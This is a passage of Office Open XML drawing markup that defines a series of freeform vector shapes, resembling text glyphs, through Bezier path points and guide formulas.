                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89D5B961-7FB7-46CD-A835-D48C88C11DEC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695825" y="627063"/>
              <a:ext cx="82550" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 214 w 214"/>
                <a:gd name="T1" fmla="*/ 225 h 316"/>
                <a:gd name="T2" fmla="*/ 150 w 214"/>
                <a:gd name="T3" fmla="*/ 144 h 316"/>
                <a:gd name="T4" fmla="*/ 199 w 214"/>
                <a:gd name="T5" fmla="*/ 67 h 316"/>
                <a:gd name="T6" fmla="*/ 107 w 214"/>
                <a:gd name="T7" fmla="*/ 0 h 316"/>
                <a:gd name="T8" fmla="*/ 15 w 214"/>
                <a:gd name="T9" fmla="*/ 55 h 316"/>
                <a:gd name="T10" fmla="*/ 33 w 214"/>
                <a:gd name="T11" fmla="*/ 74 h 316"/>
                <a:gd name="T12" fmla="*/ 50 w 214"/>
                <a:gd name="T13" fmla="*/ 56 h 316"/>
                <a:gd name="T14" fmla="*/ 44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0 w 214"/>
                <a:gd name="T21" fmla="*/ 117 h 316"/>
                <a:gd name="T22" fmla="*/ 99 w 214"/>
                <a:gd name="T23" fmla="*/ 133 h 316"/>
                <a:gd name="T24" fmla="*/ 67 w 214"/>
                <a:gd name="T25" fmla="*/ 145 h 316"/>
                <a:gd name="T26" fmla="*/ 82 w 214"/>
                <a:gd name="T27" fmla="*/ 156 h 316"/>
                <a:gd name="T28" fmla="*/ 106 w 214"/>
                <a:gd name="T29" fmla="*/ 156 h 316"/>
                <a:gd name="T30" fmla="*/ 189 w 214"/>
                <a:gd name="T31" fmla="*/ 225 h 316"/>
                <a:gd name="T32" fmla="*/ 108 w 214"/>
                <a:gd name="T33" fmla="*/ 295 h 316"/>
                <a:gd name="T34" fmla="*/ 28 w 214"/>
                <a:gd name="T35" fmla="*/ 259 h 316"/>
                <a:gd name="T36" fmla="*/ 35 w 214"/>
                <a:gd name="T37" fmla="*/ 244 h 316"/>
                <a:gd name="T38" fmla="*/ 18 w 214"/>
                <a:gd name="T39" fmla="*/ 226 h 316"/>
                <a:gd name="T40" fmla="*/ 0 w 214"/>
                <a:gd name="T41" fmla="*/ 245 h 316"/>
                <a:gd name="T42" fmla="*/ 108 w 214"/>
                <a:gd name="T43" fmla="*/ 316 h 316"/>
                <a:gd name="T44" fmla="*/ 214 w 214"/>
                <a:gd name="T45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5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="191"/>
                    <a:pt x="191" y="163"/>
                    <a:pt x="150" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="121"/>
                    <a:pt x="199" y="94"/>
                    <a:pt x="199" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="163" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="15" y="22"/>
                    <a:pt x="15" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="68"/>
                    <a:pt x="25" y="74"/>
                    <a:pt x="33" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="74"/>
                    <a:pt x="50" y="67"/>
                    <a:pt x="50" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="51"/>
                    <a:pt x="48" y="47"/>
                    <a:pt x="44" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="22"/>
                    <a:pt x="103" y="21"/>
                    <a:pt x="108" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="21"/>
                    <a:pt x="174" y="42"/>
                    <a:pt x="174" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="85"/>
                    <a:pt x="166" y="104"/>
                    <a:pt x="150" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="131"/>
                    <a:pt x="119" y="132"/>
                    <a:pt x="99" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="135"/>
                    <a:pt x="67" y="136"/>
                    <a:pt x="67" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="156"/>
                    <a:pt x="76" y="156"/>
                    <a:pt x="82" y="156"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="156"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="156"/>
                    <a:pt x="189" y="194"/>
                    <a:pt x="189" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="259"/>
                    <a:pt x="158" y="295"/>
                    <a:pt x="108" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="295"/>
                    <a:pt x="44" y="288"/>
                    <a:pt x="28" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="254"/>
                    <a:pt x="35" y="251"/>
                    <a:pt x="35" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="234"/>
                    <a:pt x="28" y="226"/>
                    <a:pt x="18" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="226"/>
                    <a:pt x="0" y="232"/>
                    <a:pt x="0" y="245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1"/>
                    <a:pt x="214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0" name="Freeform 1036">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD547D7-FED0-4AFF-B192-B0E4FD51CB26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797425" y="603250"/>
              <a:ext cx="74613" cy="193675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 193 w 193"/>
                <a:gd name="T1" fmla="*/ 489 h 499"/>
                <a:gd name="T2" fmla="*/ 190 w 193"/>
                <a:gd name="T3" fmla="*/ 480 h 499"/>
                <a:gd name="T4" fmla="*/ 21 w 193"/>
                <a:gd name="T5" fmla="*/ 11 h 499"/>
                <a:gd name="T6" fmla="*/ 10 w 193"/>
                <a:gd name="T7" fmla="*/ 0 h 499"/>
                <a:gd name="T8" fmla="*/ 0 w 193"/>
                <a:gd name="T9" fmla="*/ 10 h 499"/>
                <a:gd name="T10" fmla="*/ 2 w 193"/>
                <a:gd name="T11" fmla="*/ 19 h 499"/>
                <a:gd name="T12" fmla="*/ 172 w 193"/>
                <a:gd name="T13" fmla="*/ 488 h 499"/>
                <a:gd name="T14" fmla="*/ 183 w 193"/>
                <a:gd name="T15" fmla="*/ 499 h 499"/>
                <a:gd name="T16" fmla="*/ 193 w 193"/>
                <a:gd name="T17" fmla="*/ 48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499">
                  <a:moveTo>
                    <a:pt x="193" y="489"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="489"/>
                    <a:pt x="193" y="486"/>
                    <a:pt x="190" y="480"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="11"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="6"/>
                    <a:pt x="17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0"/>
                    <a:pt x="0" y="13"/>
                    <a:pt x="2" y="19"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="493"/>
                    <a:pt x="176" y="499"/>
                    <a:pt x="183" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="499"/>
                    <a:pt x="193" y="494"/>
                    <a:pt x="193" y="4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1" name="Freeform 1037">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C777716F-3874-45ED-8EF2-C0FDFB5D756E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887912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3 w 232"/>
                <a:gd name="T5" fmla="*/ 191 h 212"/>
                <a:gd name="T6" fmla="*/ 125 w 232"/>
                <a:gd name="T7" fmla="*/ 103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6 w 232"/>
                <a:gd name="T25" fmla="*/ 21 h 212"/>
                <a:gd name="T26" fmla="*/ 96 w 232"/>
                <a:gd name="T27" fmla="*/ 11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3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2 h 212"/>
                <a:gd name="T52" fmla="*/ 61 w 232"/>
                <a:gd name="T53" fmla="*/ 191 h 212"/>
                <a:gd name="T54" fmla="*/ 115 w 232"/>
                <a:gd name="T55" fmla="*/ 116 h 212"/>
                <a:gd name="T56" fmla="*/ 171 w 232"/>
                <a:gd name="T57" fmla="*/ 191 h 212"/>
                <a:gd name="T58" fmla="*/ 140 w 232"/>
                <a:gd name="T59" fmla="*/ 202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5" y="103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1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3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6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2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2" name="Freeform 1038">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C8A661-9BD4-4FCE-A089-DCC30EF00E1D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991100" y="628650"/>
              <a:ext cx="73025" cy="1206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6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3" name="Freeform 1039">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3873A797-3EB2-4248-B1B3-2B0CE92084A0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091112" y="628650"/>
              <a:ext cx="74613" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 194"/>
                <a:gd name="T1" fmla="*/ 25 h 307"/>
                <a:gd name="T2" fmla="*/ 149 w 194"/>
                <a:gd name="T3" fmla="*/ 0 h 307"/>
                <a:gd name="T4" fmla="*/ 74 w 194"/>
                <a:gd name="T5" fmla="*/ 63 h 307"/>
                <a:gd name="T6" fmla="*/ 74 w 194"/>
                <a:gd name="T7" fmla="*/ 95 h 307"/>
                <a:gd name="T8" fmla="*/ 17 w 194"/>
                <a:gd name="T9" fmla="*/ 95 h 307"/>
                <a:gd name="T10" fmla="*/ 1 w 194"/>
                <a:gd name="T11" fmla="*/ 106 h 307"/>
                <a:gd name="T12" fmla="*/ 16 w 194"/>
                <a:gd name="T13" fmla="*/ 116 h 307"/>
                <a:gd name="T14" fmla="*/ 74 w 194"/>
                <a:gd name="T15" fmla="*/ 116 h 307"/>
                <a:gd name="T16" fmla="*/ 74 w 194"/>
                <a:gd name="T17" fmla="*/ 286 h 307"/>
                <a:gd name="T18" fmla="*/ 16 w 194"/>
                <a:gd name="T19" fmla="*/ 286 h 307"/>
                <a:gd name="T20" fmla="*/ 0 w 194"/>
                <a:gd name="T21" fmla="*/ 296 h 307"/>
                <a:gd name="T22" fmla="*/ 16 w 194"/>
                <a:gd name="T23" fmla="*/ 307 h 307"/>
                <a:gd name="T24" fmla="*/ 156 w 194"/>
                <a:gd name="T25" fmla="*/ 307 h 307"/>
                <a:gd name="T26" fmla="*/ 172 w 194"/>
                <a:gd name="T27" fmla="*/ 297 h 307"/>
                <a:gd name="T28" fmla="*/ 156 w 194"/>
                <a:gd name="T29" fmla="*/ 286 h 307"/>
                <a:gd name="T30" fmla="*/ 99 w 194"/>
                <a:gd name="T31" fmla="*/ 286 h 307"/>
                <a:gd name="T32" fmla="*/ 99 w 194"/>
                <a:gd name="T33" fmla="*/ 116 h 307"/>
                <a:gd name="T34" fmla="*/ 167 w 194"/>
                <a:gd name="T35" fmla="*/ 116 h 307"/>
                <a:gd name="T36" fmla="*/ 182 w 194"/>
                <a:gd name="T37" fmla="*/ 106 h 307"/>
                <a:gd name="T38" fmla="*/ 167 w 194"/>
                <a:gd name="T39" fmla="*/ 95 h 307"/>
                <a:gd name="T40" fmla="*/ 99 w 194"/>
                <a:gd name="T41" fmla="*/ 95 h 307"/>
                <a:gd name="T42" fmla="*/ 99 w 194"/>
                <a:gd name="T43" fmla="*/ 66 h 307"/>
                <a:gd name="T44" fmla="*/ 159 w 194"/>
                <a:gd name="T45" fmla="*/ 21 h 307"/>
                <a:gd name="T46" fmla="*/ 176 w 194"/>
                <a:gd name="T47" fmla="*/ 43 h 307"/>
                <a:gd name="T48" fmla="*/ 194 w 194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7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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="95"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="95"/>
                    <a:pt x="1" y="95"/>
                    <a:pt x="1" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="116"/>
                    <a:pt x="11" y="116"/>
                    <a:pt x="16" y="116"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="286"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="286"/>
                    <a:pt x="0" y="286"/>
                    <a:pt x="0" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="307"/>
                    <a:pt x="11" y="307"/>
                    <a:pt x="16" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156" y="307"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="307"/>
                    <a:pt x="172" y="307"/>
                    <a:pt x="172" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="286"/>
                    <a:pt x="161" y="286"/>
                    <a:pt x="156" y="286"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167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3" y="95"/>
                    <a:pt x="167" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="66"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="21"/>
                    <a:pt x="137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6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4" name="Freeform 1040">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{657898A2-C6B9-4F5A-A6D0-B16276150F8E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5192712" y="603250"/>
              <a:ext cx="74613" cy="193675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 193 w 193"/>
                <a:gd name="T1" fmla="*/ 489 h 499"/>
                <a:gd name="T2" fmla="*/ 191 w 193"/>
                <a:gd name="T3" fmla="*/ 480 h 499"/>
                <a:gd name="T4" fmla="*/ 21 w 193"/>
                <a:gd name="T5" fmla="*/ 11 h 499"/>
                <a:gd name="T6" fmla="*/ 10 w 193"/>
                <a:gd name="T7" fmla="*/ 0 h 499"/>
                <a:gd name="T8" fmla="*/ 0 w 193"/>
                <a:gd name="T9" fmla="*/ 10 h 499"/>
                <a:gd name="T10" fmla="*/ 3 w 193"/>
                <a:gd name="T11" fmla="*/ 19 h 499"/>
                <a:gd name="T12" fmla="*/ 172 w 193"/>
                <a:gd name="T13" fmla="*/ 488 h 499"/>
                <a:gd name="T14" fmla="*/ 183 w 193"/>
                <a:gd name="T15" fmla="*/ 499 h 499"/>
                <a:gd name="T16" fmla="*/ 193 w 193"/>
                <a:gd name="T17" fmla="*/ 48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499">
                  <a:moveTo>
                    <a:pt x="193" y="489"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="489"/>
                    <a:pt x="193" y="486"/>
                    <a:pt x="191" y="480"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="11"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="6"/>
                    <a:pt x="17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3"/>
                    <a:pt x="3" y="19"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="493"/>
                    <a:pt x="176" y="499"/>
                    <a:pt x="183" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="499"/>
                    <a:pt x="193" y="494"/>
                    <a:pt x="193" y="4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5" name="Freeform 1041">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3119F49-B7E0-46E8-9AAB-9A244DA0A768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5283200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6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5 w 232"/>
                <a:gd name="T25" fmla="*/ 21 h 212"/>
                <a:gd name="T26" fmla="*/ 95 w 232"/>
                <a:gd name="T27" fmla="*/ 11 h 212"/>
                <a:gd name="T28" fmla="*/ 80 w 232"/>
                <a:gd name="T29" fmla="*/ 0 h 212"/>
                <a:gd name="T30" fmla="*/ 19 w 232"/>
                <a:gd name="T31" fmla="*/ 0 h 212"/>
                <a:gd name="T32" fmla="*/ 4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2 h 212"/>
                <a:gd name="T52" fmla="*/ 60 w 232"/>
                <a:gd name="T53" fmla="*/ 191 h 212"/>
                <a:gd name="T54" fmla="*/ 115 w 232"/>
                <a:gd name="T55" fmla="*/ 116 h 212"/>
                <a:gd name="T56" fmla="*/ 171 w 232"/>
                <a:gd name="T57" fmla="*/ 191 h 212"/>
                <a:gd name="T58" fmla="*/ 140 w 232"/>
                <a:gd name="T59" fmla="*/ 202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6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1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4" y="0"/>
                    <a:pt x="4" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4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6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2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6" name="Freeform 1042">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9CC6FAC-E830-4F8D-AE74-5DAE1B42261E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380037" y="630238"/>
              <a:ext cx="90488" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 235 w 235"/>
                <a:gd name="T1" fmla="*/ 198 h 307"/>
                <a:gd name="T2" fmla="*/ 140 w 235"/>
                <a:gd name="T3" fmla="*/ 89 h 307"/>
                <a:gd name="T4" fmla="*/ 69 w 235"/>
                <a:gd name="T5" fmla="*/ 121 h 307"/>
                <a:gd name="T6" fmla="*/ 69 w 235"/>
                <a:gd name="T7" fmla="*/ 16 h 307"/>
                <a:gd name="T8" fmla="*/ 53 w 235"/>
                <a:gd name="T9" fmla="*/ 0 h 307"/>
                <a:gd name="T10" fmla="*/ 16 w 235"/>
                <a:gd name="T11" fmla="*/ 0 h 307"/>
                <a:gd name="T12" fmla="*/ 0 w 235"/>
                <a:gd name="T13" fmla="*/ 11 h 307"/>
                <a:gd name="T14" fmla="*/ 16 w 235"/>
                <a:gd name="T15" fmla="*/ 21 h 307"/>
                <a:gd name="T16" fmla="*/ 44 w 235"/>
                <a:gd name="T17" fmla="*/ 21 h 307"/>
                <a:gd name="T18" fmla="*/ 44 w 235"/>
                <a:gd name="T19" fmla="*/ 288 h 307"/>
                <a:gd name="T20" fmla="*/ 57 w 235"/>
                <a:gd name="T21" fmla="*/ 304 h 307"/>
                <a:gd name="T22" fmla="*/ 69 w 235"/>
                <a:gd name="T23" fmla="*/ 273 h 307"/>
                <a:gd name="T24" fmla="*/ 134 w 235"/>
                <a:gd name="T25" fmla="*/ 307 h 307"/>
                <a:gd name="T26" fmla="*/ 235 w 235"/>
                <a:gd name="T27" fmla="*/ 198 h 307"/>
                <a:gd name="T28" fmla="*/ 210 w 235"/>
                <a:gd name="T29" fmla="*/ 198 h 307"/>
                <a:gd name="T30" fmla="*/ 133 w 235"/>
                <a:gd name="T31" fmla="*/ 286 h 307"/>
                <a:gd name="T32" fmla="*/ 69 w 235"/>
                <a:gd name="T33" fmla="*/ 211 h 307"/>
                <a:gd name="T34" fmla="*/ 69 w 235"/>
                <a:gd name="T35" fmla="*/ 173 h 307"/>
                <a:gd name="T36" fmla="*/ 137 w 235"/>
                <a:gd name="T37" fmla="*/ 110 h 307"/>
                <a:gd name="T38" fmla="*/ 210 w 235"/>
                <a:gd name="T39" fmla="*/ 1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7">
                  <a:moveTo>
                    <a:pt x="235" y="198"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="138"/>
                    <a:pt x="192" y="89"/>
                    <a:pt x="140" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="89"/>
                    <a:pt x="94" y="98"/>
                    <a:pt x="69" y="121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8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="296"/>
                    <a:pt x="44" y="304"/>
                    <a:pt x="57" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="304"/>
                    <a:pt x="69" y="296"/>
                    <a:pt x="69" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="303"/>
                    <a:pt x="119" y="307"/>
                    <a:pt x="134" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="307"/>
                    <a:pt x="235" y="260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6"/>
                    <a:pt x="133" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="286"/>
                    <a:pt x="69" y="237"/>
                    <a:pt x="69" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69" y="173"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="140"/>
                    <a:pt x="101" y="110"/>
                    <a:pt x="137" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="110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7" name="Freeform 1043">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA9C79A8-5EA1-4E1B-9206-AEE9E842721C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5486400" y="628650"/>
              <a:ext cx="74613" cy="1206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1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6 w 193"/>
                <a:gd name="T25" fmla="*/ 307 h 307"/>
                <a:gd name="T26" fmla="*/ 172 w 193"/>
                <a:gd name="T27" fmla="*/ 297 h 307"/>
                <a:gd name="T28" fmla="*/ 156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7 w 193"/>
                <a:gd name="T35" fmla="*/ 116 h 307"/>
                <a:gd name="T36" fmla="*/ 182 w 193"/>
                <a:gd name="T37" fmla="*/ 106 h 307"/>
                <a:gd name="T38" fmla="*/ 167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9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1" y="95"/>
                    <a:pt x="1" y="95"/>
                    <a:pt x="1" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="116"/>
                    <a:pt x="11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1" y="286"/>
                    <a:pt x="0" y="286"/>
                    <a:pt x="0" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="307"/>
                    <a:pt x="11" y="307"/>
                    <a:pt x="16" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156" y="307"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="307"/>
                    <a:pt x="172" y="307"/>
                    <a:pt x="172" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="286"/>
                    <a:pt x="161" y="286"/>
                    <a:pt x="156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7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3" y="95"/>
                    <a:pt x="167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3" y="36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8" name="Freeform 1044">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6E9D4AA-14CB-4EDA-8A06-4BA77C67C6D1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613400" y="630238"/>
              <a:ext cx="28575" cy="58738"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 72"/>
                <a:gd name="T1" fmla="*/ 53 h 149"/>
                <a:gd name="T2" fmla="*/ 37 w 72"/>
                <a:gd name="T3" fmla="*/ 0 h 149"/>
                <a:gd name="T4" fmla="*/ 16 w 72"/>
                <a:gd name="T5" fmla="*/ 20 h 149"/>
                <a:gd name="T6" fmla="*/ 37 w 72"/>
                <a:gd name="T7" fmla="*/ 41 h 149"/>
                <a:gd name="T8" fmla="*/ 44 w 72"/>
                <a:gd name="T9" fmla="*/ 40 h 149"/>
                <a:gd name="T10" fmla="*/ 51 w 72"/>
                <a:gd name="T11" fmla="*/ 53 h 149"/>
                <a:gd name="T12" fmla="*/ 6 w 72"/>
                <a:gd name="T13" fmla="*/ 128 h 149"/>
                <a:gd name="T14" fmla="*/ 0 w 72"/>
                <a:gd name="T15" fmla="*/ 137 h 149"/>
                <a:gd name="T16" fmla="*/ 10 w 72"/>
                <a:gd name="T17" fmla="*/ 149 h 149"/>
                <a:gd name="T18" fmla="*/ 72 w 72"/>
                <a:gd name="T19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49">
                  <a:moveTo>
                    <a:pt x="72" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="18"/>
                    <a:pt x="56" y="0"/>
                    <a:pt x="37" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="16" y="10"/>
                    <a:pt x="16" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="31"/>
                    <a:pt x="24" y="41"/>
                    <a:pt x="37" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="41"/>
                    <a:pt x="44" y="40"/>
                    <a:pt x="44" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="40"/>
                    <a:pt x="51" y="47"/>
                    <a:pt x="51" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="63"/>
                    <a:pt x="50" y="103"/>
                    <a:pt x="6" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="130"/>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="144"/>
                    <a:pt x="5" y="149"/>
                    <a:pt x="10" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="149"/>
                    <a:pt x="72" y="114"/>
                    <a:pt x="72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9" name="Freeform 1045">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6296BA0C-4B88-44BE-A61F-124CD1809A2C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713412" y="630238"/>
              <a:ext cx="28575" cy="58738"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 73 w 73"/>
                <a:gd name="T1" fmla="*/ 53 h 149"/>
                <a:gd name="T2" fmla="*/ 38 w 73"/>
                <a:gd name="T3" fmla="*/ 0 h 149"/>
                <a:gd name="T4" fmla="*/ 17 w 73"/>
                <a:gd name="T5" fmla="*/ 20 h 149"/>
                <a:gd name="T6" fmla="*/ 37 w 73"/>
                <a:gd name="T7" fmla="*/ 41 h 149"/>
                <a:gd name="T8" fmla="*/ 44 w 73"/>
                <a:gd name="T9" fmla="*/ 40 h 149"/>
                <a:gd name="T10" fmla="*/ 52 w 73"/>
                <a:gd name="T11" fmla="*/ 53 h 149"/>
                <a:gd name="T12" fmla="*/ 7 w 73"/>
                <a:gd name="T13" fmla="*/ 128 h 149"/>
                <a:gd name="T14" fmla="*/ 0 w 73"/>
                <a:gd name="T15" fmla="*/ 137 h 149"/>
                <a:gd name="T16" fmla="*/ 11 w 73"/>
                <a:gd name="T17" fmla="*/ 149 h 149"/>
                <a:gd name="T18" fmla="*/ 73 w 73"/>
                <a:gd name="T19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49">
                  <a:moveTo>
                    <a:pt x="73" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="18"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="38" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="17" y="10"/>
                    <a:pt x="17" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="31"/>
                    <a:pt x="25" y="41"/>
                    <a:pt x="37" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="41"/>
                    <a:pt x="44" y="40"/>
                    <a:pt x="44" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="40"/>
                    <a:pt x="52" y="47"/>
                    <a:pt x="52" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="63"/>
                    <a:pt x="50" y="103"/>
                    <a:pt x="7" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="130"/>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="144"/>
                    <a:pt x="6" y="149"/>
